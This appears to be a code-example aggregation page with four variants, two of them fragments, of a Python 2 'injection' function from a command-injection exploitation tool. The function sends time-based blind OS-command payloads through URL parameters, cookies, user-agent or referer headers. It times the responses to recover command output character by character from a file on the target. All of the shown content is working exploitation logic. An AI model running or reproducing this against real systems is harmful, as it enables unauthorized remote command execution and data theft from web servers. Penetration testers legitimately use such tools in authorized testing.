Example #1
0
def injection(
    separator,
    maxlen,
    TAG,
    cmd,
    prefix,
    suffix,
    delay,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    alter_shell,
):
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )
        else:
            payload = tfb_payloads.cmd_execution(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
            if menu.options.verbose:
                print "\n"
            else:
                sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                sys.stdout.flush()
            print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []

        percent = 0
        sys.stdout.write(
            "\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]"
        )
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(32, 129):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )
                else:
                    payload = tfb_payloads.get_char(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write(
                        "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                    )

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

                if how_long >= delay:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        percent = (num_of_chars * 100) / output_length
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))

                        sys.stdout.write(
                            "\r(*) Grabbing the output from '"
                            + OUTPUT_TEXTFILE
                            + "', please wait... [ "
                            + str(float_percent)
                            + "% ]"
                        )
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        check_start = 0
        sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
        sys.stdout.flush()
        check_how_long = 0
        output = ""

    return check_how_long, output
Example #2
0
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = []
    
    percent = 0
    sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ "+str(percent)+"% ]")
    sys.stdout.flush()

    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(32, 129):
        
        # Get the execution ouput, of shell execution.
        if not alter_shell :
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
          
        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)
          
        else:
          start = 0
          end = 0
          start = time.time()
          
Example #3
0
        check_start = time.time()

        output = []

        percent = 0
        sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE +
                         "', please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(32, 129):

                # Get the execution ouput, of shell execution.
                if not alter_shell:
                    payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
                                                    num_of_chars, ascii_char,
                                                    delay, http_request_method)
                else:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter,
                                                     payload)
Example #4
0
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
              http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
              alter_shell, filename):
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False

    sys.stdout.write("(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url)

        if how_long >= delay:
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
                                     Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(
                    output_length) + " characters." + Style.RESET_ALL
                found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []

        percent = 0
        sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE +
                         "', please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(32, 129):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
                                                    num_of_chars, ascii_char,
                                                    delay, http_request_method)

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter,
                                                     payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter,
                                                      payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url)

                if how_long >= delay:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(
                            round(
                                ((num_of_chars * 100) / (output_length * 1.0)),
                                2))

                        sys.stdout.write("\r(*) Grabbing the output from '" +
                                         OUTPUT_TEXTFILE +
                                         "', please wait... [ " +
                                         str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL +
                             "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        output = ""

    return check_how_long, output